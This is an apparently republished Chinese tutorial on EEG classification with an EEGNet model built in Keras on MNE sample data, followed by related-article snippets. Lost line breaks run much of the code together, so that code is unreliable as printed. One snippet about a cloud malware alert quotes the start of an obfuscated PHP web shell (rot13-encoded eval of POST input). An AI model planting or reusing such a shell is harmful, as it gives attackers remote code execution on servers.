基于MNE的EEGNet 神经网络的脑电信号分类实战(附完整源码)

利用MNE中的EEG数据,进行EEGNet神经网络的脑电信号分类实现:

代码:

代码主要包括一下几个步骤:
1)从MNE中加载脑电信号,并进行相应的预处理操作,得到训练集、验证集以及测试集,每个集中都包括数据和标签;
2)基于tensorflow构建EEGNet网络模型;
3)编译模型,配置损失函数、优化器和评估指标等,并进行模型训练和预测;
4)绘制训练集和验证集的损失曲线以及训练集和验证集的准确度曲线。
代码如下:

import mne
import os
from pathlib import Path
import numpy as np
from keras.src.utils import np_utilsfrom mne import io
from mne.datasets import sample
import matplotlib.pyplot as plt
import pathlibfrom keras.models import Model
from keras.layers import Dense, Activation, Permute, Dropout
from keras.layers import Conv2D, MaxPooling2D, AveragePooling2D
from keras.layers import SeparableConv2D, DepthwiseConv2D
from keras.layers import BatchNormalization
from keras.layers import SpatialDropout2D
from keras.regularizers import l1_l2
from keras.layers import Input, Flatten
from keras.constraints import max_norm
from keras import backend as K
from keras.src.callbacks import ModelCheckpointfrom sklearn.pipeline import make_pipeline
from sklearn.linear_model import LogisticRegressiondef EEGNet(nb_classes, Chans=64, Samples=128,dropoutRate=0.5, kernelLength=64,F1=8, D=2, F2=16, norm_rate=0.25,dropout_type='Dropout'):"""EEGNet模型的实现。参数:- nb_classes: int, 输出类别的数量。- Chans: int, 通道数,默认为64。- Samples: int, 每个通道的样本数,默认为128。- dropoutRate: float, Dropout率,默认为0.5。- kernelLength: int, 卷积核的长度,默认为64。- F1: int, 第一个卷积层的滤波器数量,默认为8。- D: int, 深度乘法器,默认为2。- F2: int, 第二个卷积层的滤波器数量,默认为16。- norm_rate: float, 权重范数约束,默认为0.25。- dropout_type: str, Dropout类型,默认为'Dropout'。返回:- Model: Keras模型对象。"""# 根据dropout_type参数确定使用哪种Dropout方式if dropout_type == 'SpatialDropout2D':dropoutType = SpatialDropout2Delif dropout_type == 'Dropout':dropoutType = Dropoutelse:raise ValueError('dropout_type must be one of SpatialDropout2D ''or Dropout, passed as a string.')# 定义模型的输入层input1 = Input(shape=(Chans, Samples, 1))# 第一个卷积块block1 = Conv2D(F1, (1, kernelLength), padding='same',input_shape=(Chans, Samples, 1),use_bias=False)(input1)block1 = BatchNormalization()(block1)block1 = DepthwiseConv2D((Chans, 1), use_bias=False,depth_multiplier=D,depthwise_constraint=max_norm(1.))(block1)block1 = BatchNormalization()(block1)block1 = Activation('elu')(block1)block1 = AveragePooling2D((1, 4))(block1)block1 = dropoutType(dropoutRate)(block1)# 第二个卷积块block2 = SeparableConv2D(F2, (1, 16),use_bias=False, padding='same')(block1)block2 = BatchNormalization()(block2)block2 = Activation('elu')(block2)block2 = AveragePooling2D((1, 8))(block2)block2 = dropoutType(dropoutRate)(block2)# 将卷积块的输出展平以便输入到全连接层flatten = Flatten(name='flatten')(block2)# 定义全连接层dense = Dense(nb_classes, name='dense', kernel_constraint=max_norm(norm_rate))(flatten)softmax = Activation('softmax', name='softmax')(dense)# 创建并返回模型return Model(inputs=input1, outputs=softmax)def get_data4EEGNet(kernels, chans, samples):"""为EEGNet模型准备数据。该函数从指定的文件路径中读取原始EEG数据和事件数据,进行预处理,包括滤波、选择通道、分割数据集,并将数据集按给定的通道、核数和样本数进行重塑。参数:kernels - 数据集中的核数量。chans - 数据集中的通道数量。samples - 数据集中的样本数量。返回:X_train, X_validate, X_test, y_train, y_validate, y_test - 分别是训练、验证和测试数据集,以及相应的标签。"""# 设置图像数据格式,确保数据维度顺序正确K.set_image_data_format('channels_last')# 定义数据路径data_path = Path("C:\\Users\\72671\\mne_data\\MNE-sample-data")# 定义原始数据和事件数据的文件路径raw_fname = os.path.join(data_path, "MEG", "sample", "sample_audvis_filt-0-40_raw.fif")event_fname = os.path.join(data_path, "MEG", "sample", "sample_audvis_filt-0-40_raw-eve.fif")# 定义时间范围和事件IDtmin, tmax = -0., 1event_id = dict(aud_l=1, aud_r=2, vis_l=3, vis_r=4)# 读取并预处理原始数据raw = io.Raw(raw_fname, preload=True, verbose=False)raw.filter(2, None, method='iir')events = mne.read_events(event_fname)# 设置无效通道并选择所需通道类型raw.info['bads'] = ['MEG 2443']picks = mne.pick_types(raw.info, meg=False, eeg=True, stim=False, eog=False,exclude='bads')# 创建epochs数据集epochs = mne.Epochs(raw, events, event_id, tmin, tmax, proj=False, picks=picks, baseline=None,preload=True, verbose=False)labels = epochs.events[:, -1]# 获取数据并进行缩放X = epochs.get_data(copy=False) * 1e6y = labels# 分割数据集为训练、验证和测试集X_train = X[0:144, ]y_train = y[0:144]X_validate = X[144:216, ]y_validate = y[144:216]X_test = X[216:, ]y_test = y[216:]# 将训练、验证和测试数据集中的标签转换为one-hot编码# 减1是因为标签通常从1开始计数,而one-hot编码需要从0开始y_train = np_utils.to_categorical(y_train-1)y_validate = np_utils.to_categorical(y_validate-1)y_test = np_utils.to_categorical(y_test-1)# 重塑数据集以匹配EEGNet模型的输入要求X_train = X_train.reshape(X_train.shape[0], chans, samples, kernels)X_validate = X_validate.reshape(X_validate.shape[0], chans, samples, kernels)X_test = X_test.reshape(X_test.shape[0], chans, samples, kernels)# 返回准备好的数据集return X_train, X_validate, X_test, y_train, y_validate, y_test#########################################################################
# 定义模型参数
kernels, chans, samples = 1, 60, 151
# 获取预处理后的EEG数据集
X_train, X_validate, X_test, y_train, y_validate, y_test = get_data4EEGNet(kernels, chans, samples)# 初始化EEGNet模型
model = EEGNet(nb_classes=4, Chans=chans, Samples=samples, dropoutRate=0.5,kernelLength=32, F1=8, D=2, F2=16, dropout_type='Dropout')# 编译模型,配置损失函数、优化器和评估指标
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])# 设置模型检查点以保存最佳模型
checkpointer = ModelCheckpoint(filepath='./models/EEGNet_best_model.h5', verbose=1, save_best_only=True)
# 定义类别权重
class_weights = {0: 1, 1: 1, 2: 1, 3: 1}# 训练模型
fittedModel = model.fit(X_train, y_train, batch_size=32, epochs=500, verbose=2,validation_data=(X_validate, y_validate),callbacks=[checkpointer], class_weight=class_weights)# 加载最佳模型权重
model.load_weights('./models/EEGNet_best_model.h5')# 对测试集进行预测
probs = model.predict(X_test)
# 获取预测标签
preds = probs.argmax(axis=-1)
# 计算分类准确率
acc = np.mean(preds == y_test.argmax(axis=-1))# 输出分类准确率
print("Classification accuracy: %f " % (acc))# 获取训练历史
history = fittedModel.history# 绘制训练集和验证集的损失曲线
plt.figure(figsize=(12, 4))
plt.subplot(1, 2, 1)
plt.plot(history['loss'], label='Training Loss')
plt.plot(history['val_loss'], label='Validation Loss')
plt.title('Loss Curves')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend()# 绘制训练集和验证集的准确度曲线
plt.subplot(1, 2, 2)
plt.plot(history['accuracy'], label='Training Accuracy')
plt.plot(history['val_accuracy'], label='Validation Accuracy')
plt.title('Accuracy Curves')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend()plt.tight_layout()
plt.show()

效果如下:

在这里插入图片描述

参考资料:

论文链接: EEGNet: a compact convolutional neural network for EEG-based brain–computer interfaces(Journal of Neural Engineering,SCI JCR2,Impact Factor:4.141)
Github链接: the Army Research Laboratory (ARL) EEGModels project

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/890012.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LM芯片学习

1、LM7805稳压器 https://zhuanlan.zhihu.com/p/626577102?utm_campaignshareopn&utm_mediumsocial&utm_psn1852815231102873600&utm_sourcewechat_sessionhttps://zhuanlan.zhihu.com/p/626577102?utm_campaignshareopn&utm_mediumsocial&utm_psn18528…

2025山东科技大学考研专业课复习资料一览

[冲刺]2025年山东科技大学020200应用经济学《814经济学之西方经济学[宏观部分]》考研学霸狂刷870题[简答论述计算题]1小时前[强化]2025年山东科技大学085600材料与化工《817物理化学》考研强化检测5套卷22小时前[冲刺]2025年山东科技大学030100法学《704综合一[法理学、国际法学…

vue自定义颜色选择器(重置版)

实现效果 相较于上次发布的颜色选择器&#xff0c;这次加入了圆形的选择器&#xff0c;并且优化了代码。 <SquareColor ref"squareColor" :color"color" change"changeColor1" />setColor1() {// this.color rgba(255, 82, 111, 0.5)thi…

timestamp 时间戳转换成日期的方法 | java.util

时间戳通常是一个long数据&#xff08;注意java中赋值时需要带上L标识是long整型&#xff0c;否则int过长报错&#xff09; 代码实现 常用工具类&#xff1a; java.util.Datejava.time.Instantjava.time.format.DateTimeFormatter toInstant() 方法的功能是将一个 Date 对象…

Minio入门搭建图片服务器

Minio入门搭建图片服务器 闲来无事&#xff0c;之前一直想弄弄图片服务器的软件&#xff0c;搜索了一下有zimg、Nginx、Thumbor、Minio等。想想之前也用过minio&#xff0c;所以就用这个搭建啦。 1. docker安装 docker run -d -p 9000:9000 -p 9001:9001 \ …

从腾讯云的恶意文件查杀学习下PHP的eval函数

问题来自于腾讯云的主机安全通知&#xff1a; &#x1f680;一键接入&#xff0c;畅享GPT及AI大模型服务&#xff01;【顶级API中转品牌】&#xff1a; https://api.ablai.top/ 病毒文件副本内容如下&#xff1a; <?php function x($x){eval($x);}x(str_rot13(riny($_CBF…

CISC RISC

CISC&#xff1a;设计目标是通过复杂的指令来提高代码密度&#xff0c;减少指令数量&#xff0c;适合内存资源较为有限的系统。CISC处理器的硬件复杂度较高&#xff0c;但在某些应用场合&#xff08;如桌面计算机&#xff09;能够提供足够的性能。 RISC&#xff1a;设计目标是…

使用LSTM神经网络对股票日线行情进行回归训练(Pytorch版)

版权声明&#xff1a;本文为博主原创文章&#xff0c;如需转载请贴上原博文链接&#xff1a;使用LSTM神经网络对股票日线行情进行回归训练&#xff08;Pytorch版&#xff09;-CSDN博客 前言&#xff1a;近期在尝试使用lstm对股票日线数据进行拟合&#xff0c;初见成型但是效果不…

睡岗和玩手机数据集,4653张原始图,支持YOLO,VOC XML,COCO JSON格式的标注

睡岗和玩手机数据集&#xff0c;4653张原始图&#xff0c;支持YOLO&#xff0c;VOC XML&#xff0c;COCO JSON格式的标注 数据集分割 训练组70&#xff05; 3257图片 有效集20&#xff05; 931图片 测试集10&#xff05; 465图片 预处理 没有采用任何预处…

Pandas 索引

在 Pandas 中&#xff0c;索引&#xff08;Index&#xff09;是 DataFrame 和 Series 的核心组成部分&#xff0c;用于标识和访问数据。索引提供了快速、灵活和强大的数据检索方法。以下是关于 Pandas 索引的一些关键点&#xff1a; 1. 创建索引 当创建一个 DataFrame 或 Seri…

labml.ai Deep Learning Paper Implementations (带注释的 PyTorch 版论文实现)

labml.ai Deep Learning Paper Implementations {带注释的 PyTorch 版论文实现} 1. labml.ai2. labml.ai Deep Learning Paper Implementations3. Sampling Techniques for Language Models (语言模型的采样技术)4. Multi-Headed Attention (MHA)References 1. labml.ai https…

使用 Marp 将 Markdown 导出为 PPT 后不可编辑的原因说明及解决方案

Marp 是一个流行的 Markdown 演示文稿工具&#xff0c;能够将 Markdown 文件转换为 PPTX 格式。然而&#xff0c;用户在使用 Marp 导出 PPT 时&#xff0c;可能会遇到以下问题&#xff1a; 导出 PPT 不可直接编辑的原因 根据 Marp GitHub 讨论&#xff0c;Marp 导出的 PPTX 文…

构建一个rust生产应用读书笔记四(实战2)

此门课程学习采用actix-web框架完成一个生产级别的rust应用&#xff0c;在 actix-web 中&#xff0c;Extractors 是一个非常重要的概念&#xff0c;它们用于从传入的 HTTP 请求中提取特定的信息片段。actix-web 提供了多种内置的提取器&#xff0c;以满足常见的使用场景。说白了…

优选生产报工系统:关键选择要素

【优选生产报工系统&#xff1a;数据分析、产品管理与基础数据登录的关键选择要素】 在快速变化的制造业环境中&#xff0c;生产报工系统的重要性不言而喻。它不仅仅是一种记录工时和监控生产进度的工具&#xff0c;更是一种能够实现数据驱动决策、优化产品管理和确保基础数据…

使用Python打造高效的PDF文件管理应用(合并以及分割)

在日常工作和学习中&#xff0c;我们经常需要处理大量PDF文件。手动合并、分割PDF不仅耗时&#xff0c;还容易出错。今天&#xff0c;我们将使用Python的wxPython和PyMuPDF库&#xff0c;开发一个强大且易用的PDF文件管理工具。 C:\pythoncode\new\mergeAndsplitPdf.py 所有代…

【C语言程序设计——入门】C语言程序开发环境(头歌实践教学平台习题)【合集】

目录&#x1f60b; <第1关&#xff1a;程序改错> 任务描述 相关知识 编程要求 测试说明 我的通关代码: 测试结果&#xff1a; <第2关&#xff1a;scanf 函数> 任务描述 相关知识 编程要求 测试说明 我的通关代码: 测试结果&#xff1a; <第1关&a…

皮肤伤口分割数据集labelme格式248张5类别

数据集格式&#xff1a;labelme格式(不包含mask文件&#xff0c;仅仅包含jpg图片和对应的json文件) 图片数量(jpg文件个数)&#xff1a;284 标注数量(json文件个数)&#xff1a;284 标注类别数&#xff1a;5 标注类别名称:["bruises","burns","cu…

JVM系列之内存区域

每日禅语 有一位年轻和尚&#xff0c;一心求道&#xff0c;多年苦修参禅&#xff0c;但一直没有开悟。有一天&#xff0c;他打听到深山中有一古寺&#xff0c;住持和尚修炼圆通&#xff0c;是得道高僧。于是&#xff0c;年轻和尚打点行装&#xff0c;跋山涉水&#xff0c;千辛万…

大腾智能CAD:国产云原生三维设计新选择

在快速发展的工业设计领域&#xff0c;CAD软件已成为不可或缺的核心工具。它通过强大的建模、分析、优化等功能&#xff0c;不仅显著提升了设计效率与精度&#xff0c;还促进了设计思维的创新与拓展&#xff0c;为产品从概念构想到实体制造的全过程提供了强有力的技术支持。然而…

leetcode 3195.包含所有1的最小矩形面积I

1.题目要求: 2.解题步骤: class Solution { public:int minimumArea(vector<vector<int>>& grid) {//设置二维数组deque<deque<int>> row_distance;for(int i 0;i < grid.size();i){//遍历数组&#xff0c;把每行头部1的小标和尾部1的下标代…